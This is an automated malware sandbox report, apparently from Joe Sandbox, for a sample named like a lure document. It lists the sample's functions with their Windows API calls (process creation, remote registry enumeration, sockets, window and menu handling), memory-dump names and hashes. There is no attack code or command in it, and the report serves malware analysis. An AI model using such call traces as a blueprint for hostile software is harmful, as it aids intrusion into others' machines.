                                                        • RtlExitUserThread.NTDLL(00000000,?,00734C1D), ref: 00734C61
                                                        • GetLastError.KERNEL32(?,?,00734C1D), ref: 00734C91
                                                        • RtlExitUserThread.NTDLL(00000000,?,?,00734C1D), ref: 00734C98
                                                        • __freefls@4.LIBCMT ref: 00734CB4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 1445074172-0
                                                        • Opcode ID: f6a9c17afc1068fab6467553c84356fb4b158e9e28c457ae0fc0ec9cb5bc3248
                                                        • Instruction ID: 4391a96e72988886eebb7c255e91f460c8b93f77ded89547770cbcf60124b848
                                                        • Opcode Fuzzy Hash: f6a9c17afc1068fab6467553c84356fb4b158e9e28c457ae0fc0ec9cb5bc3248
                                                        • Instruction Fuzzy Hash: 0E01BCB1401706EBE768BB74D90E909BBA5EF04315F208519F5088B253EF3DEC428AA2
                                                        Function 0077E13E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 0077E14D
                                                        • _memset.LIBCMT ref: 0077E15C
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007D3EE0,007D3F24), ref: 0077E18B
                                                        • CloseHandle.KERNEL32 ref: 0077E19D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseCreateHandleProcess
                                                        • String ID: $?}$>}
                                                        • API String ID: 3277943733-957941094
                                                        • Opcode ID: 682b2accdb1da8e5dcbaa81f097324ad20aefc927c58b383088a2a013e4b1cb4
                                                        • Instruction ID: b7f2fd5648e7d46c508cfa520d904c671ee046d1892d51c8dc64b87f55ce32e1
                                                        • Opcode Fuzzy Hash: 682b2accdb1da8e5dcbaa81f097324ad20aefc927c58b383088a2a013e4b1cb4
                                                        • Instruction Fuzzy Hash: 22F054F1941308BEF2105765AC06FB77B7DDB09394F018422BA04E5192D7BE9E0047A9
                                                        Function 0072C697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClientRect.USER32(?,?), ref: 0072C6C0
                                                        • GetWindowRect.USER32(?,?), ref: 0072C701
                                                        • ScreenToClient.USER32(?,?), ref: 0072C729
                                                        • GetClientRect.USER32(?,?), ref: 0072C856
                                                        • GetWindowRect.USER32(?,?), ref: 0072C86F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Rect$Client$Window$Screen
                                                        • String ID:
                                                        • API String ID: 1296646539-0
                                                        • Opcode ID: af17463a9ddc4e45a0e45f43a551d381f380e5af99b5666d3a8dfd0d4f17ac06
                                                        • Instruction ID: bfc46062e916ce5cb5fa6fa3bbcd2c187e6e5c215ee3149bec41ddc99fc422ff
                                                        • Opcode Fuzzy Hash: af17463a9ddc4e45a0e45f43a551d381f380e5af99b5666d3a8dfd0d4f17ac06
                                                        • Instruction Fuzzy Hash: 29B15A79900249DBDF11CFA8C9807EDB7B1FF18350F14912AED59EB255EB38AA40CB64
                                                        Function 00759569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memmove$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 3253778849-0
                                                        • Opcode ID: 8b8bd9b5be6ffa6ab735417ff86383e87c8f19c6858aa891cc26bb6e74eaaee2
                                                        • Instruction ID: 218571e50e0ee772805fcdea263614af862484fff223d57fecdf5aadc5277c28
                                                        • Opcode Fuzzy Hash: 8b8bd9b5be6ffa6ab735417ff86383e87c8f19c6858aa891cc26bb6e74eaaee2
                                                        • Instruction Fuzzy Hash: 0A61AB3050025AEBDB11EF64CC8AEFE37A8AF49704F044455FD1A6B192EB789D49CB91
                                                        Function 00772EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                          • Part of subcall function 00773AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00772AA6,?,?), ref: 00773B0E
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00772FA0
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00772FE0
                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00773003
                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0077302C
                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0077306F
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0077307C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                        • String ID:
                                                        • API String ID: 4046560759-0
                                                        • Opcode ID: 7a656affff6f2c64070cc3c61fae2b38c6c164f06c888943b6ae9234effe25e1
                                                        • Instruction ID: 41d07f68c9496d492d36db20cc4bc04cd89ab3572fa5b938f0de85c57c4644b7
                                                        • Opcode Fuzzy Hash: 7a656affff6f2c64070cc3c61fae2b38c6c164f06c888943b6ae9234effe25e1
                                                        • Instruction Fuzzy Hash: 2A517A31108200EFCB14EF68C889EAAB7F9FF88354F04891DF555872A1DB79EA45CB52
                                                        Function 0072DB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$_wcscat
                                                        • String ID:
                                                        • API String ID: 2037614760-0
                                                        • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                        • Instruction ID: 01ee857f9022e84baf5f24b294de66f04a43365cc9033147b686839d3f5f31a4
                                                        • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                        • Instruction Fuzzy Hash: 7251E470904135EECB31AF98E4559BDB3B5EF08710F90804AF541AB292DBBC5F82D7A0
                                                        Function 00752ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00752AF6
                                                        • VariantClear.OLEAUT32(00000013), ref: 00752B68
                                                        • VariantClear.OLEAUT32(00000000), ref: 00752BC3
                                                        • _memmove.LIBCMT ref: 00752BED
                                                        • VariantClear.OLEAUT32(?), ref: 00752C3A
                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00752C68
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                        • String ID:
                                                        • API String ID: 1101466143-0
                                                        • Opcode ID: 460d8ceca87a47656e955c81685511b6da0ef0e45e4ac2967f7d4b1c5b992a6a
                                                        • Instruction ID: c5e317bee3a9cdff74dfbff73abb4ed8aedf8ed87d6d4a6b6114635ad12f055e
                                                        • Opcode Fuzzy Hash: 460d8ceca87a47656e955c81685511b6da0ef0e45e4ac2967f7d4b1c5b992a6a
                                                        • Instruction Fuzzy Hash: 29517AB5A00209EFCB24CF58C884AAAB7B8FF4D314B158559ED49DB311E334E942CFA0
                                                        Function 007782DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetMenu.USER32(?), ref: 0077833D
                                                        • GetMenuItemCount.USER32(00000000), ref: 00778374
                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0077839C
                                                        • GetMenuItemID.USER32(?,?), ref: 0077840B
                                                        • GetSubMenu.USER32(?,?), ref: 00778419
                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0077846A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountMessagePostString
                                                        • String ID:
                                                        • API String ID: 650687236-0
                                                        • Opcode ID: 96a486020ae881799d7e757e2643e07ac26106f574dfc19d02cd8463d978787e
                                                        • Instruction ID: fccae1fe3c208e53d5fc6a1eba485db32403d344b048ea0f8a64ef1412b7fcce
                                                        • Opcode Fuzzy Hash: 96a486020ae881799d7e757e2643e07ac26106f574dfc19d02cd8463d978787e
                                                        • Instruction Fuzzy Hash: 2751BF31A00215EFCF50EF68C849AEEB7B4EF48750F148459E819BB351CB78AE428B95
                                                        Function 0076936F Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00769409
                                                        • WSAGetLastError.WS2_32(00000000), ref: 00769416
                                                        • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0076943A
                                                        • _strlen.LIBCMT ref: 00769484
                                                        • _memmove.LIBCMT ref: 007694CA
                                                        • WSAGetLastError.WS2_32(00000000), ref: 007694F7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_memmove_strlenselect
                                                        • String ID:
                                                        • API String ID: 2795762555-0
                                                        • Opcode ID: 561e017763958231676b2d5d3c3e6a87e006064eb761730c74537abd9d814d8a
                                                        • Instruction ID: 376bf98f6ce9464b00288bd4cc75a4298cd452c3b74f77d2ad12a40d7c1623da
                                                        • Opcode Fuzzy Hash: 561e017763958231676b2d5d3c3e6a87e006064eb761730c74537abd9d814d8a
                                                        • Instruction Fuzzy Hash: D2414275500104EBCB14EBA8C999AEEB7BDEF48310F108159FA16972D1DF38DE45CB60
                                                        Function 007554E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 0075552E
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00755579
                                                        • IsMenu.USER32(00000000), ref: 00755599
                                                        • CreatePopupMenu.USER32 ref: 007555CD
                                                        • GetMenuItemCount.USER32(000000FF), ref: 0075562B
                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0075565C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                        • String ID:
                                                        • API String ID: 3311875123-0
                                                        • Opcode ID: 240bdb7243f0da3a1b6ce7bfff2bed890cdffc12219e7c7c458e13b8c2c7e51e
                                                        • Instruction ID: c202ae2ab13cfb7db514c5b1bffac206008e3a8e0db5ee0d423dd6bcee7cacc9
                                                        • Opcode Fuzzy Hash: 240bdb7243f0da3a1b6ce7bfff2bed890cdffc12219e7c7c458e13b8c2c7e51e
                                                        • Instruction Fuzzy Hash: 3251C170600A85DFDF20CF68C8A8BEDBBF5EF0571AF504119E8159B290E3F89949CB51
                                                        Function 0072B18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 0072B1C1
                                                        • GetWindowRect.USER32(?,?), ref: 0072B225
                                                        • ScreenToClient.USER32(?,?), ref: 0072B242
                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0072B253
                                                        • EndPaint.USER32(?,?), ref: 0072B29D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                        • String ID:
                                                        • API String ID: 1827037458-0
                                                        • Opcode ID: f76f1747a8b5edef3b950390589840363f227aeee62f21155e8c9ff4e4aa1dd8
                                                        • Instruction ID: 0701602e82afd9f3f7d851568c2e7a4c989ccf1bb1c8b53eec03c1409700b3bd
                                                        • Opcode Fuzzy Hash: f76f1747a8b5edef3b950390589840363f227aeee62f21155e8c9ff4e4aa1dd8
                                                        • Instruction Fuzzy Hash: 35418D71104310EFC721DF24EC88BAA7BF8FB4A360F14466AFA95872A1C7399C45DB65
                                                        Function 0077E1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShowWindow.USER32(007D1810,00000000,?,?,007D1810,007D1810,?,0078E2D6), ref: 0077E21B
                                                        • EnableWindow.USER32(00000000,00000000), ref: 0077E23F
                                                        • ShowWindow.USER32(007D1810,00000000,?,?,007D1810,007D1810,?,0078E2D6), ref: 0077E29F
                                                        • ShowWindow.USER32(00000000,00000004,?,?,007D1810,007D1810,?,0078E2D6), ref: 0077E2B1
                                                        • EnableWindow.USER32(00000000,00000001), ref: 0077E2D5
                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0077E2F8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$Enable$MessageSend
                                                        • String ID:
                                                        • API String ID: 642888154-0
                                                        • Opcode ID: 34ceaf08a88794aacae3b9d6506f512d708f890dd53a244c28f9e21298a1a212
                                                        • Instruction ID: 4f8d924b1807f4c53bb7104790b4fdcec4ee0b79925aa4a34b3397fa8a2c9289
                                                        • Opcode Fuzzy Hash: 34ceaf08a88794aacae3b9d6506f512d708f890dd53a244c28f9e21298a1a212
                                                        • Instruction Fuzzy Hash: F3415B31600940EFDF26CF18C499B947BA5BB0A344F1881F9EA5C8F2A3C739AC52CB51
                                                        Function 0077E9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0072B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0072B5EB
                                                          • Part of subcall function 0072B58B: SelectObject.GDI32(?,00000000), ref: 0072B5FA
                                                          • Part of subcall function 0072B58B: BeginPath.GDI32(?), ref: 0072B611
                                                          • Part of subcall function 0072B58B: SelectObject.GDI32(?,00000000), ref: 0072B63B
                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0077E9F2
                                                        • LineTo.GDI32(00000000,00000003,?), ref: 0077EA06
                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0077EA14
                                                        • LineTo.GDI32(00000000,00000000,?), ref: 0077EA24
                                                        • EndPath.GDI32(00000000), ref: 0077EA34
                                                        • StrokePath.GDI32(00000000), ref: 0077EA44
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                        • String ID:
                                                        • API String ID: 43455801-0
                                                        • Opcode ID: 918e8a4d4b373aaa14af0c9cb6137ea4b6c1b0c6b12238eb43999061845d6f98
                                                        • Instruction ID: 9acd3d6f591520e8a23f4efb5aa05db0cb4725ba5c730efafcb07178e488eee3
                                                        • Opcode Fuzzy Hash: 918e8a4d4b373aaa14af0c9cb6137ea4b6c1b0c6b12238eb43999061845d6f98
                                                        • Instruction Fuzzy Hash: 4C11097600014DBFDF129F94DC88EEA7FADEB08360F04C012FA094A160D7759D56DBA4
                                                        Function 0074EF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 0074EFB6
                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0074EFC7
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0074EFCE
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0074EFD6
                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0074EFED
                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0074EFFF
                                                          • Part of subcall function 0074A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,0074A79D,00000000,00000000,?,0074AB73), ref: 0074B2CA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
